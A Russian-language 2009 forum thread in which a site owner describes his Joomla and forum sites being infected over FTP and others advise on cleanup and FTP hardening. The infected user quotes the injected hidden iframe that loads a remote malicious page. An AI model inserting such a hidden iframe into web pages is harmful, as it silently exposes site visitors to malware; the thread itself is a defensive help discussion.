VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Сегодня у меня были атакованы все сайты(Joomla и Булка) и на тбилисском хостинге и на американском вирусом по - <iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe> по FTP. американские сайты востановил (и форум), а вот тбилисский пока что нет (сначала не понял в чем дело и "дров наломал" надо теперь думать!!!
Пароли нормальные на фтп ставить и, прежде всего, обезопасить СОБСТВЕННЫЙ ПК.
@sava36
Знаток
Join Date: Aug 2006
Location: Грузия, ТБИЛИСИ
Posts: 819
Reputation:
Knowing 263
Репутация в разделе: 97
0
Quote:
Originally Posted by OldEr
Пароли нормальные на фтп ставить и, прежде всего, обезопасить СОБСТВЕННЫЙ ПК.
На ПК -NOD32 -4, пароли на фтп - 14 знаков.
только в админке пришлось править 104 файла, в основном index.html. выковыривать "заразу". Ша просканирую "морду"
OldEr
Специалист
Join Date: Jun 2007
Награды в конкурсах:
Posts: 4,731
Версия vB: 3.8.x
Пол:
Reputation:
Мастер 4230
Репутация в разделе: 513
0
sava36, сканируйте куритом. (Бесплатная утилита CureIt от DrWeb.)
@DiffuSer
Продвинутый
Join Date: Jul 2006
Posts: 349
Версия vB: 3.8.4
Reputation:
Опытный 58
Репутация в разделе: 6
0
А чем можно "просканировать морду"?
@sava36
Знаток
Join Date: Aug 2006
Location: Грузия, ТБИЛИСИ
Posts: 819
Reputation:
Knowing 263
Репутация в разделе: 97
0
Quote:
Originally Posted by DiffuSer
А чем можно "просканировать морду"?
Total Commander поиском:
OldEr
Специалист
Join Date: Jun 2007
Награды в конкурсах:
Posts: 4,731
Версия vB: 3.8.x
Пол:
Reputation:
Мастер 4230
Репутация в разделе: 513
0
DiffuSer, глазами просмотреть или c помощью программы Araxis Merge сравнить с иходным файлом. Но и настольный ПК просканировать тоже нужно, чтобы не повторилось такое. = )
@sava36
Знаток
Join Date: Aug 2006
Location: Грузия, ТБИЛИСИ
Posts: 819
Reputation:
Knowing 263
Репутация в разделе: 97
0
Тбилисский сайт востановил. пришлось править 198 файлов. в основном - index.html. За сайт на американском хостинге даже браться "боюсь" так востановил форум на глазок, пока сойдет, завтра и там просканирую, но откуда же на оба хостинга вся эта гадость залезла????
sava36 добавил 14.07.2009 в 03:54 http://a5j.ru/ этот сайтп осылает "говно" как-то надо его "успокоить"
Last edited by sava36 : 07-14-2009 at 03:54 AM.
Reason: Добавлено сообщение
Raveex
Продвинутый
Join Date: Sep 2006
Posts: 233
Версия vB: 3.8.x
Reputation:
Опытный 96
Репутация в разделе: 7
1
Quote:
Originally Posted by sava36
но откуда же на оба хостинга вся эта гадость залезла????
Вспоминай где посеял пароль на фтп. Скорее всего троян когда-то стырил. Про антивирусы не рассказывай, лучше про фаервол расскажи.
@True
Администратор
Join Date: Nov 2007
Награды в конкурсах:
Posts: 1,369
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 1356
Репутация в разделе: 231
3
sava36, мой хостер такое рекомендует по твоей проблеме:
Quote:
Что нужно делать чтобы ваш сайт не пострадал от такой атаки:
1. Актуальный антивирус + что то из Анти Spyware программ и фаервол.
2. Постоянные обновления данных программ.
3. Не храните пароли в FTP программах.
4. Для обеспечения безопасности вашего FTP разрешите подключения только с ваших IP адресов.
Чтобы разрешить доступ по FTP только с определенных IP, разместите в корне своей площадки файл .ftpaccess с содержимым:
<Limit ALL>
Allow from xx.xx.xx.xx
Allow from xx.xx.xx.xx
Deny from all
</Limit>
Вирусная атака сайтов по FTP
